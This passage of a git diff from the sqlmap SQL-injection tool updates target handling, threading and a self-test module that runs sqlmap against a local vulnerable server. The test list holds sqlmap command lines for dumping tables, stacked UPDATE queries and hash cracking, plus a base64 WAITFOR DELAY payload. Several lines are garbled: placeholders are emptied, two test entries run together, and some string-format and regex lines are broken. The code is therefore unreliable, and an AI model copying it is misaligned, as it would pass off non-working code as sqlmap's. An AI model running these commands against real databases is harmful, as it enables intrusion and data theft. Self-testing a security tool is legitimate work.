logger.warn(warnMsg) + conf.outputPath = tempDir - conf.outputPath = tempDir + conf.outputPath = getUnicode(conf.outputPath) try: - with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: - f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) + with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f: + f.write(getUnicode(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) + f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) if conf.data: - f.write("\n\n%s" % conf.data) - except IOError, ex: - if "denied" in str(ex): + f.write("\n\n%s" % getUnicode(conf.data)) + except IOError as ex: + if "denied" in getUnicode(ex): errMsg = "you don't have enough permissions " else: errMsg = "something went wrong while trying " - errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, ex) + errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) raise SqlmapMissingPrivileges(errMsg) + except UnicodeError as ex: + warnMsg = "something went wrong while saving target data ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) _createDumpDir() _createFilesDir() _configureDumper() -def _restoreCmdLineOptions(): +def _setAuxOptions(): + """ + Setup auxiliary (host-dependent) options + """ + + kb.aliasName = randomStr(seed=hash(conf.hostname or "")) + +def _restoreMergedOptions(): """ - Restore command line options that could be possibly - changed during the testing of previous target. + Restore merged options (command line, configuration file and default values) + that could be possibly changed during the testing of previous target. """ - conf.regexp = cmdLineOptions.regexp - conf.string = cmdLineOptions.string - conf.textOnly = cmdLineOptions.textOnly + + for option in RESTORE_MERGED_OPTIONS: + conf[option] = mergedOptions[option] def initTargetEnv(): """ @@ -505,23 +723,45 @@ def initTargetEnv(): if conf.cj: resetCookieJar(conf.cj) + threadData = getCurrentThreadData() + threadData.reset() + conf.paramDict = {} conf.parameters = {} conf.hashDBFile = None _setKnowledgeBaseAttributes(False) - _restoreCmdLineOptions() + _restoreMergedOptions() _setDBMS() if conf.data: - class _(unicode): + class _(six.text_type): pass - original = conf.data - conf.data = _(urldecode(conf.data)) - setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + kb.postUrlEncode = True + + for key, value in conf.httpHeaders: + if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): + kb.postUrlEncode = "urlencoded" in value + break + + if kb.postUrlEncode: + original = conf.data + conf.data = _(urldecode(conf.data)) + setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + kb.postSpaceToPlus = '+' in original + + if conf.data and unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST: + if '=' not in conf.data.strip('='): + try: + original = conf.data + conf.data = _(decodeBase64(conf.data, binary=False)) + setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + except: + pass - kb.postSpaceToPlus = '+' in original + match = re.search(INJECT_HERE_REGEX, "%s %s %s" % (conf.url, conf.data, conf.httpHeaders)) + kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR def setupTargetEnv(): _createTargetDirs() @@ -530,3 +770,4 @@ def setupTargetEnv(): _resumeHashDBValues() _setResultsFile() _setAuthCred() + _setAuxOptions() diff --git a/lib/core/testing.py b/lib/core/testing.py index 0b72fd39f9c..a8d3182680b 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -1,323 +1,314 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs import doctest +import logging import os +import random import re -import shutil +import socket +import sqlite3 import sys import tempfile +import threading import time -import traceback -from extra.beep.beep import beep -from lib.controller.controller import start +from extra.vulnserver import vulnserver from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout -from lib.core.common import getUnicode +from lib.core.common import randomInt from lib.core.common import randomStr -from lib.core.common import readXmlFile -from lib.core.data import conf +from lib.core.common import shellExec +from lib.core.compat import round +from lib.core.convert import encodeBase64 +from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.log import LOGGER_HANDLER -from lib.core.option import init -from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING -from lib.parse.cmdline import cmdLineParser - -failedItem = None -failedParseOn = None -failedTraceBack = None +from lib.core.data import queries +from lib.core.patch import unisonRandom +from lib.core.settings import IS_WIN -def smokeTest(): +def vulnTest(): """ - This will run the basic smoke testing of a program + Runs the testing against 'vulnserver' """ - retVal = True - count, length = 0, 0 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - for ifile in files: - length += 1 + TESTS = ( + ("-h", ("to see full list of options run with '-hh'",)), + ("--dependencies", ("sqlmap requires", "third-party library")), + ("-u --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")), + ("-u --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")), + (u"-c --flush-session --output-dir=\"\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")), + (u"-u --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --titles --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'", "~with --string",)), + ("-m --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")), + ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")), + ("-u \"&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)), + ("--list-tampers", ("between", "MySQL", "xforwardedfor")), + ("-r --flush-session -v 5 --test-skip=\"heavy\" --save=", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), + ("-c ", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")), + ("-l --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), + ("-l --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), + ("-u --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), + ("-u -p id --base64=id --data=\"base64=true\" --flush-session --banner --technique=B", ("banner: '3.",)), + ("-u -p id --base64=id --data=\"base64=true\" --flush-session --tables --technique=U", (" users ",)), + ("-u --flush-session --banner --technique=B --disable-precon --not-string \"no results\"", ("banner: '3.",)), + ("-u --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2", ("banner: '3.'",)), + ("-u --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), + ("-u --flush-session --technique=BU --data=\"{\\\"id\\\": 1}\" --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: UNION query", "banner: '3.")), + ("-u --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner --smart -v 5", ("might be injectable", "Payload: --flush-session --technique=BU --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har= --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: UNION query", "2 entries")), + ("-u --flush-session -H \"id: 1*\" --tables -t ", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), + ("-u --flush-session --banner --invalid-logical --technique=B --predict-output --titles --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")), + ("-u --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), + ("-u --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 30")), + ("-u --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)), + ("-u --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), + ("-u --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "27 entries", "6E616D6569736E756C6C")), + ("-u --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 31 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")), + ("-u --flush-session --technique=BU --all", ("30 entries", "Type: boolean-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), + ("-u -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")), + ("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), + ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), + ("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")), + ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)), + ("-u csrf --data=\"id=1&csrf_token=1\" --banner --answers=\"update=y\" --flush-session", ("back-end DBMS: SQLite", "banner: '3.")), + ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")), + ) - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue + retVal = True + count = 0 + cleanups = [] - for ifile in files: - if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": - path = os.path.join(root, os.path.splitext(ifile)[0]) - path = path.replace(paths.SQLMAP_ROOT_PATH, '.') - path = path.replace(os.sep, '.').lstrip('.') - try: - __import__(path) - module = sys.modules[path] - except Exception, msg: - retVal = False - dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) - logger.error(errMsg) - else: - # Run doc tests - # Reference: http://docs.python.org/library/doctest.html - (failure_count, test_count) = doctest.testmod(module) - if failure_count > 0: - retVal = False + while True: + address, port = "127.0.0.1", random.randint(10000, 65535) + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + if s.connect_ex((address, port)): + break + else: + time.sleep(1) + finally: + s.close() - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + def _thread(): + vulnserver.init(quiet=True) + vulnserver.run(address=address, port=port) - clearConsoleLine() - if retVal: - logger.info("smoke test final result: PASSED") - else: - logger.error("smoke test final result: FAILED") + vulnserver._alive = True - return retVal + thread = threading.Thread(target=_thread) + thread.daemon = True + thread.start() -def adjustValueType(tagName, value): - for family in optDict.keys(): - for name, type_ in optDict[family].items(): - if type(type_) == tuple: - type_ = type_[0] - if tagName == name: - if type_ == "boolean": - value = (value == "True") - elif type_ == "integer": - value = int(value) - elif type_ == "float": - value = float(value) + while vulnserver._alive: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.connect((address, port)) + s.sendall(b"GET / HTTP/1.1\r\n\r\n") + result = b"" + while True: + current = s.recv(1024) + if not current: + break + else: + result += current + if b"vulnserver" in result: break - return value - -def liveTest(): - """ - This will run the test of a program against the live testing environment - """ - global failedItem - global failedParseOn - global failedTraceBack - - retVal = True - count = 0 - global_ = {} - vars_ = {} - - livetests = readXmlFile(paths.LIVE_TESTS_XML) - length = len(livetests.getElementsByTagName("case")) - - element = livetests.getElementsByTagName("global") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - global_[child.tagName] = adjustValueType(child.tagName, child.getAttribute("value")) - - element = livetests.getElementsByTagName("vars") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - var = child.getAttribute("value") - vars_[child.tagName] = randomStr(6) if var == "random" else var - - for case in livetests.getElementsByTagName("case"): - console_output = False - count += 1 - name = None - parse = [] - switches = dict(global_) - value = "" - vulnerable = True - result = None + except: + pass + finally: + s.close() + time.sleep(1) + + if not vulnserver._alive: + logger.error("problem occurred in vulnserver instantiation (address: 'http://%s:%s')" % (address, port)) + return False + else: + logger.info("vulnserver running at 'http://%s:%s'..." % (address, port)) - if case.hasAttribute("name"): - name = case.getAttribute("name") + handle, config = tempfile.mkstemp(suffix=".conf") + os.close(handle) + cleanups.append(config) - if conf.runCase and ((conf.runCase.isdigit() and conf.runCase != count) or not re.search(conf.runCase, name, re.DOTALL)): - continue + handle, database = tempfile.mkstemp(suffix=".sqlite") + os.close(handle) + cleanups.append(database) - if case.getElementsByTagName("switches"): - for child in case.getElementsByTagName("switches")[0].childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - value = replaceVars(child.getAttribute("value"), vars_) - switches[child.tagName] = adjustValueType(child.tagName, value) + with sqlite3.connect(database) as conn: + c = conn.cursor() + c.executescript(vulnserver.SCHEMA) - if case.getElementsByTagName("parse"): - for item in case.getElementsByTagName("parse")[0].getElementsByTagName("item"): - if item.hasAttribute("value"): - value = replaceVars(item.getAttribute("value"), vars_) + handle, request = tempfile.mkstemp(suffix=".req") + os.close(handle) + cleanups.append(request) - if item.hasAttribute("console_output"): - console_output = bool(item.getAttribute("console_output")) + handle, log = tempfile.mkstemp(suffix=".log") + os.close(handle) + cleanups.append(log) - parse.append((value, console_output)) + handle, multiple = tempfile.mkstemp(suffix=".lst") + os.close(handle) + cleanups.append(multiple) - msg = "running live test case: %s (%d/%d)" % (name, count, length) - logger.info(msg) + content = "POST / HTTP/1.0\nUser-Agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) + with open(request, "w+") as f: + f.write(content) + f.flush() - try: - result = runCase(switches, parse) - except SqlmapNotVulnerableException: - vulnerable = False + content = '%d' % (port, encodeBase64(content, binary=False)) + with open(log, "w+") as f: + f.write(content) + f.flush() - test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING) - test_case_fd.write("%s\n" % name) + base = "http://%s:%d/" % (address, port) + url = "%s?id=1" % base + direct = "sqlite3://%s" % database + tmpdir = tempfile.mkdtemp() - if result is True: - logger.info("test passed") - cleanCase() - else: - errMsg = "test failed " + with open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))) as f: + content = f.read().replace("url =", "url = %s" % url) - if failedItem: - errMsg += "at parsing item \"%s\" " % failedItem + with open(config, "w+") as f: + f.write(content) + f.flush() - errMsg += "- scan folder: %s " % paths.SQLMAP_OUTPUT_PATH - errMsg += "- traceback: %s" % bool(failedTraceBack) + content = "%s?%s=%d\n%s?%s=%d\n%s&%s=1" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr()) + with open(multiple, "w+") as f: + f.write(content) + f.flush() - if not vulnerable: - errMsg += " - SQL injection not detected" + for options, checks in TESTS: + status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) + dataToStdout("\r[%s] [INFO] completed: %s" % (time.strftime("%X"), status)) - logger.error(errMsg) - test_case_fd.write("%s\n" % errMsg) + if IS_WIN and "uraj" in options: + options = options.replace(u"\u0161u\u0107uraj", "sucuraj") + checks = [check.replace(u"\u0161u\u0107uraj", "sucuraj") for check in checks] - if failedParseOn: - console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) - console_output_fd.write(failedParseOn) - console_output_fd.close() + for tag, value in (("", url), ("", base), ("", direct), ("", tmpdir), ("", request), ("", log), ("", multiple), ("", config), ("", url.replace("id=1", "id=MZ=%3d"))): + options = options.replace(tag, value) - if failedTraceBack: - traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) - traceback_fd.write(failedTraceBack) - traceback_fd.close() + cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) - beep() + if "" in cmd: + handle, tmp = tempfile.mkstemp() + os.close(handle) + cmd = cmd.replace("", tmp) - if conf.stopFail is True: - return retVal + output = shellExec(cmd) - test_case_fd.close() - retVal &= bool(result) + if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output: + dataToStdout("---\n\n$ %s\n" % cmd) + dataToStdout("%s---\n" % output, coloring=False) + retVal = False - dataToStdout("\n") + count += 1 + clearConsoleLine() if retVal: - logger.info("live test final result: PASSED") + logger.info("vuln test final result: PASSED") else: - logger.error("live test final result: FAILED") - - return retVal + logger.error("vuln test final result: FAILED") -def initCase(switches=None): - global failedItem - global failedParseOn - global failedTraceBack + for filename in cleanups: + try: + os.remove(filename) + except: + pass - failedItem = None - failedParseOn = None - failedTraceBack = None + return retVal - paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-") - paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") - paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") +def smokeTest(): + """ + Runs the basic smoke testing of a program + """ - logger.debug("using output directory '%s' for this test case" % paths.SQLMAP_OUTPUT_PATH) + unisonRandom() - cmdLineOptions = cmdLineParser() + with open(paths.ERRORS_XML, "r") as f: + content = f.read() - if switches: - for key, value in switches.items(): - if key in cmdLineOptions.__dict__: - cmdLineOptions.__dict__[key] = value + for regex in re.findall(r'', content): + try: + re.compile(regex) + except re.error: + errMsg = "smoke test failed at compiling '%s'" % regex + logger.error(errMsg) + return False - init(cmdLineOptions, True) + retVal = True + count, length = 0, 0 -def cleanCase(): - shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True) + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra", "interbase")): + continue -def runCase(switches=None, parse=None): - global failedItem - global failedParseOn - global failedTraceBack + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + length += 1 - initCase(switches) + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra", "interbase")): + continue - LOGGER_HANDLER.stream = sys.stdout = tempfile.SpooledTemporaryFile(max_size=0, mode="w+b", prefix="sqlmapstdout-") - retVal = True - handled_exception = None - unhandled_exception = None - result = False - console = "" - - try: - result = start() - except KeyboardInterrupt: - pass - except SqlmapBaseException, e: - handled_exception = e - except Exception, e: - unhandled_exception = e - finally: - sys.stdout.seek(0) - console = sys.stdout.read() - LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ - - if unhandled_exception: - failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) - retVal = None - elif handled_exception: - failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) - retVal = None - elif result is False: # this means no SQL injection has been detected - if None, ignore - retVal = False - - console = getUnicode(console, system=True) - - if parse and retVal: - with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f: - content = f.read() - - for item, console_output in parse: - parse_on = console if console_output else content - - if item.startswith("r'") and item.endswith("'"): - if not re.search(item[2:-1], parse_on, re.DOTALL): - retVal = None - failedItem = item - break + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename not in ("__init__.py", "gui.py"): + path = os.path.join(root, os.path.splitext(filename)[0]) + path = path.replace(paths.SQLMAP_ROOT_PATH, '.') + path = path.replace(os.sep, '.').lstrip('.') + try: + __import__(path) + module = sys.modules[path] + except Exception as ex: + retVal = False + dataToStdout("\r") + errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) + logger.error(errMsg) + else: + logger.setLevel(logging.CRITICAL) + kb.smokeMode = True - elif item not in parse_on: - retVal = None - failedItem = item - break + (failure_count, _) = doctest.testmod(module) - if failedItem is not None: - failedParseOn = console + kb.smokeMode = False + logger.setLevel(logging.INFO) - elif retVal is False: - failedParseOn = console + if failure_count > 0: + retVal = False - return retVal + count += 1 + status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) + dataToStdout("\r[%s] [INFO] completed: %s" % (time.strftime("%X"), status)) + + def _(node): + for __ in dir(node): + if not __.startswith('_'): + candidate = getattr(node, __) + if isinstance(candidate, str): + if '\\' in candidate: + try: + re.compile(candidate) + except: + errMsg = "smoke test failed at compiling '%s'" % candidate + logger.error(errMsg) + raise + else: + _(candidate) -def replaceVars(item, vars_): - retVal = item + for dbms in queries: + try: + _(queries[dbms]) + except: + retVal = False - if item and vars_: - for var in re.findall("\$\{([^}]+)\}", item): - if var in vars_: - retVal = retVal.replace("${%s}" % var, vars_[var]) + clearConsoleLine() + if retVal: + logger.info("smoke test final result: PASSED") + else: + logger.error("smoke test final result: FAILED") return retVal diff --git a/lib/core/threads.py b/lib/core/threads.py index 849da683fd4..7334560036a 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -1,24 +1,30 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import difflib +import sqlite3 import threading import time import traceback -from thread import error as threadError - +from lib.core.compat import WichmannHill +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSkipTargetException from lib.core.exception import SqlmapThreadException +from lib.core.exception import SqlmapUserQuitException from lib.core.exception import SqlmapValueException from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import PYVERSION @@ -41,26 +47,37 @@ def reset(self): self.disableStdOut = False self.hashDBCursor = None self.inTransaction = False + self.lastCode = None self.lastComparisonPage = None self.lastComparisonHeaders = None - self.lastErrorPage = None + self.lastComparisonCode = None + self.lastComparisonRatio = None + self.lastPageTemplateCleaned = None + self.lastPageTemplate = None + self.lastErrorPage = tuple() self.lastHTTPError = None self.lastRedirectMsg = None self.lastQueryDuration = 0 + self.lastPage = None self.lastRequestMsg = None self.lastRequestUID = 0 + self.lastRedirectURL = tuple() + self.random = WichmannHill() self.resumed = False self.retriesCount = 0 self.seqMatcher = difflib.SequenceMatcher(None) self.shared = shared + self.technique = None + self.validationRun = 0 self.valueStack = [] ThreadData = _ThreadData() -def getCurrentThreadUID(): - return hash(threading.currentThread()) +def readInput(message, default=None, checkBatch=True, boolean=False): + # It will be overwritten by original from lib.core.common + pass -def readInput(message, default=None): +def isDigit(value): # It will be overwritten by original from lib.core.common pass @@ -69,8 +86,6 @@ def getCurrentThreadData(): Returns current thread's local data """ - global ThreadData - return ThreadData def getCurrentThreadName(): @@ -80,16 +95,22 @@ def getCurrentThreadName(): return threading.current_thread().getName() -def exceptionHandledFunction(threadFunction): +def exceptionHandledFunction(threadFunction, silent=False): try: threadFunction() except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True raise - except Exception, errMsg: - # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + except Exception as ex: + from lib.core.common import getSafeExString + + if not silent and kb.get("threadContinue") and not kb.get("multipleCtrlC") and not isinstance(ex, (SqlmapUserQuitException, SqlmapSkipTargetException)): + errMsg = getSafeExString(ex) if isinstance(ex, SqlmapBaseException) else "%s: %s" % (type(ex).__name__, getSafeExString(ex)) + logger.error("thread %s: '%s'" % (threading.currentThread().getName(), errMsg)) + + if conf.get("verbose") > 1 and not isinstance(ex, SqlmapConnectionException): + traceback.print_exc() def setDaemon(thread): # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation @@ -101,102 +122,144 @@ def setDaemon(thread): def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): threads = [] - kb.multiThreadMode = True + def _threadFunction(): + try: + threadFunction() + finally: + if conf.hashDB: + conf.hashDB.close() + + kb.multipleCtrlC = False kb.threadContinue = True kb.threadException = False - - if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)): - while True: - message = "please enter number of threads? [Enter for %d (current)] " % numThreads - choice = readInput(message, default=str(numThreads)) - if choice and choice.isdigit(): - if int(choice) > MAX_NUMBER_OF_THREADS: - errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS - logger.critical(errMsg) - else: - numThreads = int(choice) - break - - if numThreads == 1: - warnMsg = "running in a single-thread mode. This could take a while." - logger.warn(warnMsg) + kb.technique = ThreadData.technique + kb.multiThreadMode = False try: + if threadChoice and conf.threads == numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): + while True: + message = "please enter number of threads? [Enter for %d (current)] " % numThreads + choice = readInput(message, default=str(numThreads)) + if choice: + skipThreadCheck = False + + if choice.endswith('!'): + choice = choice[:-1] + skipThreadCheck = True + + if isDigit(choice): + if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: + errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS + logger.critical(errMsg) + else: + conf.threads = numThreads = int(choice) + break + + if numThreads == 1: + warnMsg = "running in a single-thread mode. This could take a while" + logger.warning(warnMsg) + if numThreads > 1: if startThreadMsg: infoMsg = "starting %d threads" % numThreads logger.info(infoMsg) else: - threadFunction() + try: + _threadFunction() + except (SqlmapUserQuitException, SqlmapSkipTargetException): + pass return + kb.multiThreadMode = True + # Start the threads for numThread in xrange(numThreads): - thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) + thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[_threadFunction]) setDaemon(thread) try: thread.start() - except threadError, errMsg: - errMsg = "error occured while starting new thread ('%s')" % errMsg + except Exception as ex: + errMsg = "error occurred while starting new thread ('%s')" % ex logger.critical(errMsg) break threads.append(thread) # And wait for them to all finish - alive = True - while alive: + while True: alive = False for thread in threads: - if thread.isAlive(): + if thread.is_alive(): alive = True - time.sleep(0.1) + break + if not alive: + break + time.sleep(0.1) - except KeyboardInterrupt: - print + except (KeyboardInterrupt, SqlmapUserQuitException) as ex: + print() + kb.prependFlag = False kb.threadContinue = False kb.threadException = True + if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1): + kb.multipleCtrlC = True + raise SqlmapUserQuitException("user aborted (Ctrl+C was pressed multiple times)") + + kb.lastCtrlCTime = time.time() + if numThreads > 1: - logger.info("waiting for threads to finish (Ctrl+C was pressed)") + logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: - while (threading.activeCount() > 1): - pass + while threading.active_count() > 1: + time.sleep(0.1) except KeyboardInterrupt: + kb.multipleCtrlC = True raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise - except (SqlmapConnectionException, SqlmapValueException), errMsg: - print + except (SqlmapConnectionException, SqlmapValueException) as ex: + print() kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: '%s'" % (threading.currentThread().getName(), ex)) - except: - from lib.core.common import unhandledExceptionMessage + if conf.get("verbose") > 1 and isinstance(ex, SqlmapValueException): + traceback.print_exc() - print - kb.threadException = True - errMsg = unhandledExceptionMessage() - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) - traceback.print_exc() + except Exception as ex: + print() + + if not kb.multipleCtrlC: + if isinstance(ex, sqlite3.Error): + raise + else: + from lib.core.common import unhandledExceptionMessage + + kb.threadException = True + errMsg = unhandledExceptionMessage() + logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + traceback.print_exc() finally: 